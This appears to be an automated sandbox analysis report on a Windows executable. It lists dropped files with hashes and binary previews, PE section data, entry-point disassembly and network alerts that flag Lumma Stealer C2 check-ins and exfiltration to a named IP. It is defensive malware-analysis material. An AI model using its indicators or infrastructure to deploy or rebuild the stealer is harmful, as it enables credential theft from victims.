                                                                                                                                                                    SSDEEP:1536:xj62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwug:xjfTq8QLeAg0Fuz08XvBNbjaAtg
                                                                                                                                                                    MD5:7A1D29A789B8F5CA0F4186AA1DBC3BC2
                                                                                                                                                                    SHA1:A9A3169FF90FA2BFFB8D96F95FFDB3A70386B476
                                                                                                                                                                    SHA-256:A513073A8C2E7F41CF78374498C2D980CD8DA473246AF5475C53C1D7FA7BA0DE
                                                                                                                                                                    SHA-512:AD90D9521F68AFFDA3AD4CCA4ECF1A72C3CFCB465F3D60FB8BCB02FFACD3ABD9F1DBF03C022F13FC68DA74080355CE36C0B13D4E511E0857AF60C30B2032D3A0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..F.. r.^].U..QS.].V.u..U..C.W....Cx.<H....b....}....0....{P.........w.E.;........C|......E.;...(.....2.....%....=....u....#....#....................%....=....u....#....#.....................L..............M.,K.;.t-.....K...;.t ......K....@.K...;..........;.u......E.;}...F...+U......u..~.+.N;S|sa........E.=....w..C<.]......]..].......w..C<....9M.u1.........~..[|N;.s.............f;.u......j.X....._^[..U..QQSV.u...M.W..xQ;u.}L.D..+..E....E....P.......Y..u.j..+...E..u...HQW.R...E....3.f..8.M..E..9..j.X_^[..U....SVW....3.B.....#.M.......sQ.......u%f..u....L.............j..T>.X....3...f..t...........T8.t..E.........j.Y..".t... ...f...........E......}..E......U.3.E.B.......f;.u<....}..t&%....=....u.........#.#..............;...........j.Xf;..........}..tZ..%....j.[=....u.........#.#....................%....=....u"............%....................;.r.;...r...3.B...j.Yf....'....E._^[..E......L.....E....E.,K..E.3.f;].....E..E.....2....$...I.j.Xf;..........K.<.......<....
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                    File Type:Microsoft Cabinet archive data, 488808 bytes, 9 files, at 0x2c +A "Cooked" +A "Receiver", ID 6076, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):488808
                                                                                                                                                                    Entropy (8bit):7.998475465922649
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:12288:ohQLaKCeh787wflZffn5DMrTn1GF1MwTYcOkxFdryB:PaenflZ1iT1CMaLLxFde
                                                                                                                                                                    MD5:97942C5C8DFF98863EFC71FC15CE0257
                                                                                                                                                                    SHA1:14D6BA8E5C3B7BE1BE540CA7ECAA075D5C505E3B
                                                                                                                                                                    SHA-256:B4A2CBEAA8185681ED75BDF2C34020CCAA9405A42A47C4C3D17EC6E907FD9152
                                                                                                                                                                    SHA-512:7D1FABB306D3CD38985CE6472DF17973AEE7F4D56902D48A1CF690BBAF8D5BA71D83DD79136FCA635AB51813FC3978E9871DECAD0E07D46BEE5A998E5CB77D6F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MSCF....hu......,......................................Y<. .Cooked..X.........Y<. .Receiver..(...@.....Y<. .Attractions.Q....h.....Y<. .Fingers..D..Q;.....Y<. .User.....Q......Y<. .Pot.....Q......Y<. .Alt.....Q......Y<. .Articles..T..] .....Y<. .Specialty./.s6.R..CK...xT..0|f.$9$.3.."..:Z...pI.. L.Bp..........s.h.BO.9lF..V..Z..V........./.D..$"mw<Q.b2.....$...?...}Y{..../..;0R.......G...H....E.........r..wX..A)$KZ.........f..<../....Z.............ul....Z+..i)={.'.....PW..6OO5<..s.(....k.c...N.s.Z.g.."E..KH....k....%:6A;Cj...^.O..P.m.8._.3b.......?...Z..T..V.O...I....kEA.E&.|..}...."...7...0."....Ep(...`8....Y;t+..y...&K ]RS.h.4...0AP.<Z..J..V.Pwmx.FE...,.uJm./.......k ...V....B....!u..ix.a.H.;.......gGM......bs..D..7....Q.....Id.S..4.{....*.(7..:.ym....wB)z..^C....15%|.Ru.....\.[8.....'@9j~..E...p&.]..)0...Lzz%..m....w..Z8.Og...d.....%.B.D...t..~$6.... .C..Qs..z..............h..=..)....4H+`.v"5W.....h.....X..>O...}5m.lj......&..U?.1.....WN...,tC.IN.6+....
                                                                                                                                                                    Process:C:\Users\user\Desktop\CLaYpUL3zw.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6851208
                                                                                                                                                                    Entropy (8bit):6.451509958428788
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:ty1CDpiB/weoINcERH7q/70/ske9dKVyz8SC:jViB/NooB7edGG8SC
                                                                                                                                                                    MD5:2A99036C44C996CEDEB2042D389FE23C
                                                                                                                                                                    SHA1:4F1E624BCC030E44722DE26B72C8156BF57E14E8
                                                                                                                                                                    SHA-256:73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43
                                                                                                                                                                    SHA-512:6907CD0E47293C8C96345ED00F2F3FA2241CE1671EE73A599837857BFB39F6C7E373AAD843CC78FB550D2DB10BDFE066A021CEC4C8A49AECDF06A7E71EDADEDD
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5mg...............(.hK...h..2............K...@...........................i......h...@... ..............................`e..-....................h.......e.`L...........................0d......................he. ............................text....gK......hK.................`..`.data...D(....K..*...lK.............@....rdata........O.. ....O.............@..@.eh_framdM....d..N....d.............@..@.bss.....1... e..........................idata...-...`e.......e.............@....CRT....0.....e......2e.............@....tls..........e......4e.............@....reloc..`L....e..N...6e.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):152576
                                                                                                                                                                    Entropy (8bit):6.433958275406592
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:UZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjD:UK5vPeDkjGgQaE/loUDtf0aD
                                                                                                                                                                    MD5:D49F624EA007E69AFE1163955DDBA1BB
                                                                                                                                                                    SHA1:EE35A9CEAB1F6A40694B26094FDC7727658293D2
                                                                                                                                                                    SHA-256:4052653CEDFD2F560DA3BEE9825F88F60DBD053ABB3C064F3D19D98863B2962C
                                                                                                                                                                    SHA-512:63B1629E79C35E59923D4A1C12B93FEB45241EB0D2B59A03B9EB14BF76DAA82BA124710E8F4AA157D0C63BADFDCFFD916F049B85DE4B52CAA143F0DD32AD71E8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1070), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):25405
                                                                                                                                                                    Entropy (8bit):5.118149909201556
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
                                                                                                                                                                    MD5:23812A6E32E38911133B221F39F9A20B
                                                                                                                                                                    SHA1:5B3B155889AB3A04ABDD1F195753E817ED3FDB23
                                                                                                                                                                    SHA-256:D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
                                                                                                                                                                    SHA-512:02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame
                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1070), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):25405
                                                                                                                                                                    Entropy (8bit):5.118149909201556
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
                                                                                                                                                                    MD5:23812A6E32E38911133B221F39F9A20B
                                                                                                                                                                    SHA1:5B3B155889AB3A04ABDD1F195753E817ED3FDB23
                                                                                                                                                                    SHA-256:D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
                                                                                                                                                                    SHA-512:02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame
                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):148480
                                                                                                                                                                    Entropy (8bit):6.695251861322664
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:4cBiqXvpgF4qv+32eOyKODOSpQSAU4CE0Imbi80PtCh:4cB3gBmmLsiS+SAhClbfSCh
                                                                                                                                                                    MD5:A1E25E38AD59F032B7717CC6E5E00609
                                                                                                                                                                    SHA1:F7E7D770656E25F73BE807AC53F49776810099D5
                                                                                                                                                                    SHA-256:A39C8CC684FC60938C2F6CF62640F4B67F8C29A1EE75D172735B8384F8D79E8A
                                                                                                                                                                    SHA-512:4DDCF310A6FB0E21717A14EBD47C78043B792837F21BD13392B06D08C9D4CB974407218ECFAC94D03E23DEFFE2B6B613FB408EFB1A621913AF4D97A2424D4AEA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:f;...J....f...f;........B.f;...0....Pvf;........B.f;........Pvf;........B.f;........P...f;........B.f;........Pvf;.rw.B.f;.........Pf;.rc..Pf;........@...f;.rM.B.f;............f;.r7.B.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.v.j..F.Zf;.v......t"..uWj.[.]..Oj.Z.F.f;....w... ..........M...xt...Xt...u.j.[.].P.M..A.......u.j.[.]...1..M.....E.QPj.j..M..:....M..].3.E..M.j0Xf;.......j:Zf;.s....+..........f;...k....`...f;...s....P.f;.r.....f;...]....P.f;.r..f...f;...G....P.f;.r..Bvf;...3....P.f;.r..Bvf;........P.f;...z....Bvf;........P.f;...b....Bvf;........P.f;...J....f...f;........P.f;...0....Bvf;........P.f;........Bvf;........P.f;........P...f;........P.f;........Bvf;.rw.P.f;.........Pf;.rc..Pf;........@...f;.rM.P.f;............f;.r7.P.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.vUj..F.Zf;.vM............;}.s~.U..E...;..U..M.r<.u.w.;.r3;.u.;E.u.;].r%w.;}.v.....U..1j.Z.F....f;.w... ....PQ.u..u...........M...E.E..M...0....E.....V.
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):79872
                                                                                                                                                                    Entropy (8bit):7.997576222410487
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:1536:eLQfqgBMCPA1XlKvwsSow5tLh2bBK3M1wY6FCUN8Pn+9BlGRpjyBGHS:1ICPA11KIjP5tLsbBKM176F7NVARcBGy
                                                                                                                                                                    MD5:6ECD89B15DFAEE100B13F894C76F9CEE
                                                                                                                                                                    SHA1:CFF0D1262CAD22201D25B331AFD9EB882865767F
                                                                                                                                                                    SHA-256:73D440F3C827B1B041209B7C9F2FD26D3BD6A5CDA3713B86BA965BF45AA46325
                                                                                                                                                                    SHA-512:6452A2A3DE1EC01DDA09ADF53C92A63C6AC830B3DC61CF305C08BAF5BD8FEB14EE67BD1B2BF7B8B61A46E8D3E9B23FB4097CB4565092840F6811084C98CEBC74
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:/..GG..z..>.p(.....!}..h..}..O.;....."}$48...Bk.a-,n."..n.1&.. ..........c....<i`p...'.....E3.&..Q.y......oX.W:.u.....`.....?.l..uFWV..(H.u.......H.....(%8...x,...h.i..w.y...#...\.`V'v.2..F1S+4.c.3..j.Z.r.d.b.6.h....=....yH.:.....a..m...)a...w;.=4...\i....p.'.p.$.?x....T...!G<.W4......Q.qG..B05.t..tP.E....r.S.Gx.........1~...%.6..I........4..T7...$u:...4.WC^.2v..t....E.....%....t].D....4$.U...&.h. Im..Y"{,...|...?[9[..";6....~.$2P...Fb.....UZ^9&.....!..}."<.y...?....|..Y........$......>.V.Be....l^.&.h%Z.f..6........3.n.Sg......MU.^&..A..=.b.......e"..5p...i..r.$.R.%.f..8.2`.C."r._..9.6-.b.y.y5n...L.W...?$......r..>.....A...q.....Q...E.c..[.Qho..C..G.....:.K.NT.mQ..$.s..y...F...=..\....Y=.r.U....P..0..._u.....ib...r.....V.(.)..R....1..k.h..[0....1r4.......T\p..<...n..;4\D+......u|7.s2>..60...n.,... ...X..1=...N.6.pC....@l.....p...<(....../..G.t4....7wp+...r.J%...0.N....g....]..|..n.......o.Lx..q.S...B.5],.M.H.P...@B...g.js.N.fY..9..{..
                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.984759864242593
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                    File name:CLaYpUL3zw.exe
                                                                                                                                                                    File size:7'045'120 bytes
                                                                                                                                                                    MD5:ccf904b9afa2515f1120932e4bd1f148
                                                                                                                                                                    SHA1:b7e131f06fd949ed071c745111d5589cd3be7ef9
                                                                                                                                                                    SHA256:06fc3e8f951fa3855d4056ea043a8de4d24b78df32f4423402305aa516fd56ff
                                                                                                                                                                    SHA512:c3128567f9d0f6babf70ef8cf6e1332de000d477acaeb0d3b4762ac32c4daa6c4d428c8a4f5ce4b8613c278de624c20d3ca97291d9863fdbe84831b51b27d000
                                                                                                                                                                    SSDEEP:196608:YZXavTeVG5FTdokwbzfD73IYRWVazi4rAySBQ1onE:BLeVmFCkwbzfDL1AyFMySB
                                                                                                                                                                    TLSH:5B6633B0C7A97509FB79273671F68258E024264FF164B13A517F48B81A0FE64F9A30F9
                                                                                                                                                                    File Content Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E.ng..................x.............. ... y...@.. ................................k...@................................
                                                                                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                                                                                    Entrypoint:0xfcc000
                                                                                                                                                                    Entrypoint Section:.taggant
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE
                                                                                                                                                                    Time Stamp:0x676E9445 [Fri Dec 27 11:49:25 2024 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:4
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                    Instruction
                                                                                                                                                                    jmp 00007FA03109B9FAh
                                                                                                                                                                    divps xmm5, dqword ptr [ebx+00h]
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    jmp 00007FA03109D9F5h
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [edi], al
                                                                                                                                                                    add byte ptr [eax], 00000000h
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    adc byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add al, 0Ah
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    adc byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add dword ptr [edx], ecx
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add cl, byte ptr [edx]
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add dword ptr [edx], ecx
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add al, 0Ah
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add ecx, dword ptr [edx]
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x7940550x69.idata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x7920000x53c.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x7941f80x8.idata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    0x20000x7900000x518a002fbf093837e8cee5d39ba3ec984a2c63unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .rsrc0x7920000x53c0x4001e79ce1080218c2624b7dd874ced5d20False0.6865234375data5.662923418985293IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .idata 0x7940000x20000x200a0232179652c49de360269397bdb9ecaFalse0.150390625data1.0043697745670233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    0x7960000x2980000x2000730bfccdedc6661c2d4e01afcaf3015unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    uppnmxuj0xa2e0000x19c0000x19a800dd70d50c9cd809571f434545ad0d6e17False0.9946467484394031data7.954185855265194IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    wnsrsfkt0xbca0000x20000x400e44a956cbf3c025f5df9f67f7c71e35dFalse0.7548828125data6.032118595733143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .taggant0xbcc0000x40000x2200faebd53e9e35aee09196b05031bfce31False0.06606158088235294DOS executable (COM)0.733376591014825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                    RT_VERSION0xbc83400x244data0.4689655172413793
                                                                                                                                                                    RT_MANIFEST0xbc85840x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                    DLLImport
                                                                                                                                                                    kernel32.dlllstrcpy
                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                    2024-12-28T09:29:52.671566+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549774172.67.128.184443TCP
                                                                                                                                                                    2024-12-28T09:29:53.732328+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549774172.67.128.184443TCP
                                                                                                                                                                    2024-12-28T09:29:53.732328+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549774172.67.128.184443TCP
                                                                                                                                                                    2024-12-28T09:29:54.952954+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549781172.67.128.184443TCP
                                                                                                                                                                    2024-12-28T09:29:55.726467+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549781172.67.128.184443TCP
                                                                                                                                                                    2024-12-28T09:29:55.726467+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549781172.67.128.184443TCP
                                                                                                                                                                    2024-12-28T09:29:57.475683+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549787172.67.128.184443TCP
                                                                                                                                                                    2024-12-28T09:29:58.431227+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549787172.67.128.184443TCP
                                                                                                                                                                    2024-12-28T09:30:00.115076+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549794172.67.128.184443TCP
                                                                                                                                                                    2024-12-28T09:30:02.418306+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549800172.67.128.184443TCP
                                                                                                                                                                    2024-12-28T09:30:05.088798+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549810172.67.128.184443TCP
                                                                                                                                                                    2024-12-28T09:30:08.149158+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549818172.67.128.184443TCP
                                                                                                                                                                    2024-12-28T09:30:13.613991+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549830172.67.128.184443TCP
                                                                                                                                                                    2024-12-28T09:30:14.478972+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549830172.67.128.184443TCP
                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
